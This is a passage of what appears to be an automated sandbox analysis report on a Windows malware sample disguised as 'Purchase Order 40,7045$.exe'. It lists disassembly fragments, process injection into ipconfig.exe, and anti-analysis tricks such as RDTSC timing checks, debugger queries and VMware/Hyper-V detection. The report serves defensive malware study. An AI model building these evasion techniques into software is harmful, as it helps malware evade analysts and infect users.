          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E0595 push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DD44F push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00415913 push edx; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AC62 push D8D19732h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414D57 push esi; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AD65 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414DEA push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADB2 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADBB push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E7E push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AE1C push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E24 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0040FF92 push 00000033h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02ECD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B15913 push edx; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E24 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AE1C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E7E push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B0FF92 push 00000033h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AC62 push D8D19732h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADB2 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADBB push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14DEA push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AD65 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14D57 push esi; retf

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5636Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00409900 LdrLoadDll,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,
          </
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01014257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h]
